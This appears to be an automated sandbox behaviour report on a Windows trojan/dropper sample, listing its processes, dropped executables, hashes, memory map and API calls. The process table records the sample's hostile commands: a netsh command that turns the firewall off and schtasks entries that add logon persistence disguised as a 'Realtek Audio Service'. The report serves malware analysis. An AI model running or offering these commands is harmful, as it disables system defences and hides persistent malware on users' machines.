7eef6ef8...5792 | Sequential Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Riskware, Dropper, Downloader, Trojan, Backdoor, Spyware

7eef6ef8fed53b7c3bf61ba821f375a0a433ea4cb0185fd223780b729a9a5792 (SHA256)

output.113528456.txt.exe

Windows Exe (x86-32)

Created at 2018-08-10 04:08:00

Notifications (1/1)

The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x9a4 Analysis Target High (Elevated) output.113528456.txt.exe "C:\Users\EEBsYm5\Desktop\output.113528456.txt.exe" -
#2 0xa54 Child Process High (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c netsh Advfirewall set allprofiles state off #1
#3 0xa70 Child Process High (Elevated) netsh.exe netsh Advfirewall set allprofiles state off #2
#5 0xba4 Child Process High (Elevated) vkvmtnchwv3w.exe "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe" #1
#6 0xbb8 Child Process High (Elevated) vkvmtnchwv3w.exe "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe" #5
#7 0xbf4 Child Process High (Elevated) jrsi6vakyydz.exe "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe" #1
#9 0xc88 Child Process High (Elevated) schtasks.exe "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe" /rl HIGHEST /f #7
#10 0x58c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {7737867F-ACDD-43AC-B745-B8B549957EED} S-1-5-21-3785418085-2572485238-895829336-1000:CRH2YWU7\EEBsYm5:Interactive:Highest[1] #9
#11 0xca0 Child Process High (Elevated) realtekaudio.exe "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" #7
#12 0xcec Child Process High (Elevated) schtasks.exe "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f #11

Behavior Information - Sequential View

Process #1: output.113528456.txt.exe
Information Value
ID #1
File Name c:\users\eebsym5\desktop\output.113528456.txt.exe
Command Line "C:\Users\EEBsYm5\Desktop\output.113528456.txt.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:01:33, Reason: Self Terminated
Monitor Duration 00:01:07
OS Process Information
Information Value
PID 0x9a4
Parent PID 0x5ac (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x9a8, 0xa3c, 0xa40, 0xa44, 0xa48, 0xa4c, 0xa50, 0xa80, 0xa84, 0xaa4, 0xaa8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory rw True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory rw True False False -
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory - True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory - True False False -
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory - True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory - True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory - True False False -
private_0x0000000000150000 0x00150000 0x0015ffff Private Memory - True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory rw True False False -
private_0x0000000000170000 0x00170000 0x0026ffff Private Memory rw True False False -
rpcss.dll 0x00270000 0x002cbfff Memory Mapped File r False False False -
l_intl.nls 0x00270000 0x00272fff Memory Mapped File r False False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory r True False False -
private_0x0000000000290000 0x00290000 0x0029ffff Private Memory rw True False False -
private_0x00000000002a0000 0x002a0000 0x002affff Private Memory - True False False -
sorttbls.nlp 0x002b0000 0x002b4fff Memory Mapped File r False False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory r True False False -
windowsshell.manifest 0x002d0000 0x002d0fff Memory Mapped File r False False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory r True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory rw True False False -
pagefile_0x00000000003e0000 0x003e0000 0x004a7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000004b0000 0x004b0000 0x004b1fff Pagefile Backed Memory r True False False -
private_0x00000000004c0000 0x004c0000 0x004fffff Private Memory rwx True False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory rw True False False -
pagefile_0x0000000000510000 0x00510000 0x00610fff Pagefile Backed Memory r True False False -
sortkey.nlp 0x00620000 0x00660fff Memory Mapped File r False False False -
pagefile_0x0000000000670000 0x00670000 0x00670fff Pagefile Backed Memory r True False False -
private_0x0000000000680000 0x00680000 0x0068ffff Private Memory rw True False False -
private_0x0000000000690000 0x00690000 0x0072ffff Private Memory rw True False False -
oleaccrc.dll 0x00730000 0x00730fff Memory Mapped File r False False False -
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory rw True False False -
pagefile_0x0000000000750000 0x00750000 0x00751fff Pagefile Backed Memory r True False False -
private_0x0000000000760000 0x00760000 0x0079ffff Private Memory rwx True False False -
private_0x00000000007a0000 0x007a0000 0x0089ffff Private Memory rw True False False -
pagefile_0x00000000008a0000 0x008a0000 0x008a6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000008b0000 0x008b0000 0x008b1fff Pagefile Backed Memory rw True False False -
cversions.1.db 0x008c0000 0x008c3fff Memory Mapped File r True False False -
cversions.2.db 0x008c0000 0x008c3fff Memory Mapped File r True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db 0x008d0000 0x008eefff Memory Mapped File r True False False -
pagefile_0x00000000008f0000 0x008f0000 0x008f0fff Pagefile Backed Memory rw True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db 0x00900000 0x0092ffff Memory Mapped File r True False False -
cversions.2.db 0x00930000 0x00933fff Memory Mapped File r True False False -
private_0x0000000000940000 0x00940000 0x00a3ffff Private Memory rw True False False -
sortdefault.nls 0x00a40000 0x00d0efff Memory Mapped File r False False False -
pagefile_0x0000000000d10000 0x00d10000 0x00d10fff Pagefile Backed Memory rw True False False -
rsaenh.dll 0x00d20000 0x00d5bfff Memory Mapped File r False False False -
pagefile_0x0000000000d20000 0x00d20000 0x00d20fff Pagefile Backed Memory r True False False -
private_0x0000000000d30000 0x00d30000 0x00d3ffff Private Memory - True False False -
private_0x0000000000d40000 0x00d40000 0x00ddffff Private Memory rw True False False -
private_0x0000000000d40000 0x00d40000 0x00d4ffff Private Memory - True False False -
private_0x0000000000d50000 0x00d50000 0x00e4ffff Private Memory rw True False False -
pagefile_0x0000000000d50000 0x00d50000 0x00d60fff Pagefile Backed Memory rw True False False -
private_0x0000000000e50000 0x00e50000 0x00fdffff Private Memory rw True False False -
pagefile_0x0000000000e50000 0x00e50000 0x00f2efff Pagefile Backed Memory r True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x00f30000 0x00f95fff Memory Mapped File r True False False -
private_0x0000000000fa0000 0x00fa0000 0x00fdffff Private Memory rw True False False -
private_0x0000000001020000 0x01020000 0x0111ffff Private Memory rw True False False -
private_0x0000000001120000 0x01120000 0x01220fff Private Memory rw True False False -
private_0x0000000001120000 0x01120000 0x0121ffff Private Memory rw True False False -
output.113528456.txt.exe 0x01280000 0x01287fff Memory Mapped File rwx True True False
pagefile_0x0000000001290000 0x01290000 0x01e8ffff Pagefile Backed Memory r True False False -
private_0x0000000001e90000 0x01e90000 0x03e8ffff Private Memory rw True False False -
pagefile_0x0000000003e90000 0x03e90000 0x04282fff Pagefile Backed Memory r True False False -
private_0x0000000004340000 0x04340000 0x0443ffff Private Memory rw True False False -
private_0x0000000004490000 0x04490000 0x0458ffff Private Memory rw True False False -
private_0x00000000046b0000 0x046b0000 0x047affff Private Memory rw True False False -
private_0x00000000047b0000 0x047b0000 0x0493ffff Private Memory rw True False False -
private_0x00000000049b0000 0x049b0000 0x04aaffff Private Memory rw True False False -
wminet_utils.dll 0x6a310000 0x6a318fff Memory Mapped File rwx True False False -
system.ni.dll 0x6b7a0000 0x6bf3bfff Memory Mapped File rwx True False False -
mscorlib.ni.dll 0x6bf40000 0x6ca37fff Memory Mapped File rwx True False False -
mscorwks.dll 0x6ca40000 0x6cfeafff Memory Mapped File rwx True False False -
ieframe.dll 0x6cff0000 0x6da6ffff Memory Mapped File rwx False False False -
system.management.ni.dll 0x6de80000 0x6df83fff Memory Mapped File rwx True False False -
msvcr80.dll 0x6e180000 0x6e21afff Memory Mapped File rwx False False False -
wmiutils.dll 0x6e880000 0x6e896fff Memory Mapped File rwx False False False -
wbemprox.dll 0x6ebe0000 0x6ebe9fff Memory Mapped File rwx False False False -
ntdsapi.dll 0x6ebf0000 0x6ec07fff Memory Mapped File rwx False False False -
fastprox.dll 0x6ec10000 0x6eca5fff Memory Mapped File rwx False False False -
wbemsvc.dll 0x6ef00000 0x6ef0efff Memory Mapped File rwx False False False -
system.serviceprocess.ni.dll 0x6efa0000 0x6efd6fff Memory Mapped File rwx True False False -
wbemcomn.dll 0x6f7c0000 0x6f81bfff Memory Mapped File rwx False False False -
mscorjit.dll 0x6f900000 0x6f95afff Memory Mapped File rwx True False False -
mscoreei.dll 0x6f960000 0x6f9d7fff Memory Mapped File rwx True False False -
apphelp.dll 0x718b0000 0x718fbfff Memory Mapped File rwx False False False -
mscoree.dll 0x71de0000 0x71e29fff Memory Mapped File rwx True False False -
oleacc.dll 0x72360000 0x7239bfff Memory Mapped File rwx False False False -
ntmarta.dll 0x73c00000 0x73c20fff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
propsys.dll 0x74220000 0x74314fff Memory Mapped File rwx False False False -
comctl32.dll 0x74360000 0x744fdfff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
msasn1.dll 0x753f0000 0x753fbfff Memory Mapped File rwx False False False -
devobj.dll 0x75400000 0x75411fff Memory Mapped File rwx False False False -
crypt32.dll 0x75420000 0x7553cfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75590000 0x755b6fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
wldap32.dll 0x75730000 0x75774fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
psapi.dll 0x75820000 0x75824fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
setupapi.dll 0x764b0000 0x7664cfff Memory Mapped File rwx False False False -
wininet.dll 0x76650000 0x76744fff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
urlmon.dll 0x76e70000 0x76fa5fff Memory Mapped File rwx False False False -
iertutil.dll 0x76fb0000 0x771aafff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
private_0x000000007ff50000 0x7ff50000 0x7ff5ffff Private Memory rwx True False False -
private_0x000000007ff60000 0x7ff60000 0x7ffaffff Private Memory rwx True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 30 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe 213.50 KB MD5: 1e8073f6a1421490fc093196e4eb884e; SHA1: 25b6296a419e8471ec899b8e1996fb20c5845c22; SHA256: d9a967d0caa8db86feca3ae469ef6797e81dfdac4d8531658cb242a87c80ce05; SSDeep: 6144:q+8ZepOGuDnw9tOJavXhe9Tedm/8b1tnzwa:qjZepgDj44Iyctnx YARA Match: True
C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe 4.96 MB MD5: 314d3c1ebe50ebc5d9809039ae02ba40; SHA1: 7029f1565d8cb5334d8d19f9b4e0797611037570; SHA256: 268909bc33f0f8c5312b51570016311e3676af651a57de38e42241dcc177b2d6; SSDeep: 98304:5oMp0qQF33UiVuCsLeSInsi7luD4bl5RNRn31wstaUIXke5R2/JJ:aQXG3UeupvIsi7luDspNx1TiXLRSJ YARA Match: False
Threads
Thread 0x9a8
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2 Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1 Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE True 1 Fn
Service Get Info service_name = MpsSvc True 1 Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ResetSecurity, address_out = 0x6a311944 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SetSecurity, address_out = 0x6a311986 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServices, address_out = 0x6a3119cc True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyHandle, address_out = 0x6a311a70 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = WritePropertyValue, address_out = 0x6a311a89 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = VerifyClientKey, address_out = 0x6a312270 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetQualifierSet, address_out = 0x6a311d73 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Get, address_out = 0x6a311b96 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Put, address_out = 0x6a311b7a True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Delete, address_out = 0x6a311bb5 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetNames, address_out = 0x6a311bc8 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginEnumeration, address_out = 0x6a311be4 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Next, address_out = 0x6a311bf7 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndEnumeration, address_out = 0x6a311c16 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetObjectText, address_out = 0x6a311c3c True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnInstance, address_out = 0x6a311c68 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CompareTo, address_out = 0x6a311c7e True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = InheritsFrom, address_out = 0x6a311caa True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethod, address_out = 0x6a311cbd True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutMethod, address_out = 0x6a311cd9 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = DeleteMethod, address_out = 0x6a311cf5 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = NextMethod, address_out = 0x6a311d1b True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodOrigin, address_out = 0x6a311d5d True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Get, address_out = 0x6a311d86 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Put, address_out = 0x6a311da2 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Next, address_out = 0x6a311df7 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecQueryWmi, address_out = 0x6a31169e True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutInstanceWmi, address_out = 0x6a311790 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutClassWmi, address_out = 0x6a311810 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1 Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1 Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2 Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1 Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1 Fn
System Get Info type = Operating System True 1 Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_attributes False 1 Fn
System Get Info type = Operating System True 1 Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2 Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2 Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1 Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6 Fn, Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 554 True 1 Fn, Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1 Fn
File Get Info filename = C:\Users\EEBsYm5\Desktop\output.113528456.txt.config, type = file_attributes False 2 Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 2 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1 Fn
Socket Close type = SOCK_DGRAM True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1 Fn
Socket Close type = SOCK_DGRAM True 1 Fn
System Get Computer Name result_out = CRH2YWU7 True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2 Fn, Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1 Fn
Module Map process_name = c:\users\eebsym5\desktop\output.113528456.txt.exe, desired_access = FILE_MAP_WRITE True 1 Fn
System Get Info type = Operating System True 2 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking False 1 Fn
